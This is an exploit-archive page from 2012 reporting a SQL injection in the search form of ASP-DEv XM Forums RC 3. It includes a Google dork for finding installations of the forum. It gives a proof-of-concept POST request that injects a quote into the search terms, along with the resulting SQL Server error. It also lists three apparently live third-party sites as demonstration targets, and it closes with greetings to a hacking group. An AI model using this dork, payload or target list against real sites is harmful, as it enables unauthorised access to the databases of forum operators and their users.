ASP-DEv XM Forums RC 3 SQL Injection

ASP-DEv XM Forums RC 3 SQL Injection: Posted Aug 29, 2012; Authored by Crim3R; ASP-DEv XM Forums RC 3 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.; tags | exploit, remote, sql injection, asp; SHA-256 | 9c3c3c591231a4c49635d09fc01ed180df0ee82e372b40ddb6a9cddc63595ffc; Download | Favorite | View

ASP-DEv XM Forums RC 3 SQL Injection

#######################################################
#                            #
#   ________        .__        __________________     #
#   \_   ___ \_______|__| _____ \_____  \______   \   #
#   /    \  \/\_  __ \  |/     \  _(__  <|       _/   #
#   \     \____|  | \/  |  Y Y  \/       \    |   \   #
#    \______  /|__|  |__|__|_|  /______  /____|_  /   #
#           \/                \/       \/       \/    #  
#                                #
#######################################################
#
#
# Exploit Title: ASP-DEv XM Forums RC 3 Remote Post Sql Injection Vulnerability
#
# Google Dork: Intext:"Powered by ASP-DEv XM Forums RC 3"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Download Link : http://www.asp-dev.com/download.asp?did=1
#
# Tested on: all
#
==================================

search form in ASP-DEv is Vulnerable to sql injection
P0C : 
HTTP HEADERS : 
Host: www.chillifarm.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://www.chillifarm.com/chilli_forum/search.asp
Cookie: TrackID=%7B54A35316%2D7519%2D405D%2D950A%2DA8CF50497150%7D; ASPSESSIONIDASSRDDBT=LPENAGHCNMNGMAOLEAJFMFOA
Content-Type: application/x-www-form-urlencoded
Content-Length: 46
Post Data --------------------
terms=%27&stype=1&in=1&forum=-1&ndays=0&mname=

Http response : 

28 Microsoft OLE DB Provider for SQL Server 8 21 error ' 8 80040e14 8 ' 1f

84 Unclosed quotation mark after the character string ') ORDER BY tbl_Categories.cOrder, tbl_Forums.fOrder, tbl_Topics.tLastPostDate'. 7 1f 

D3M0 : 

search query => post sql injection

http://www.chillifarm.com/chilli_forum/search.asp 

http://forums.image-src.com/search.asp

http://www.df.com/Imaging/Forum/search.asp

===============Crim3R@Att.Net=========

[+] Greetz to All Ajaxtm Security Member

Cair3x - HUrr!c4nE - black.shadowes - hadihadi - iM4n - irsdl - the-0utl4w - Expl0its - Mormoroth - Mikili - Black.Spook -
S3Ri0uS - Zalatan - Net.Edit0r - Ciph3r - A.u.r.A

Top Authors In Last 30 Days

Red Hat 240 files
Ubuntu 63 files
Debian 21 files
LiquidWorm 14 files
Apple 9 files
Gentoo 8 files
Alter Prime 3 files
EQSTLab 2 files
Yehia Elghaly 2 files
Pierre Kim 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,168)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,979)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,344)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,006)
UNIX (9,479)
UnixWare (188)
Windows (6,785)
Other

ASP-DEv XM Forums RC 3 SQL Injection

ASP-DEv XM Forums RC 3 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ASP-DEv XM Forums RC 3 SQL Injection

Share This

ASP-DEv XM Forums RC 3 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems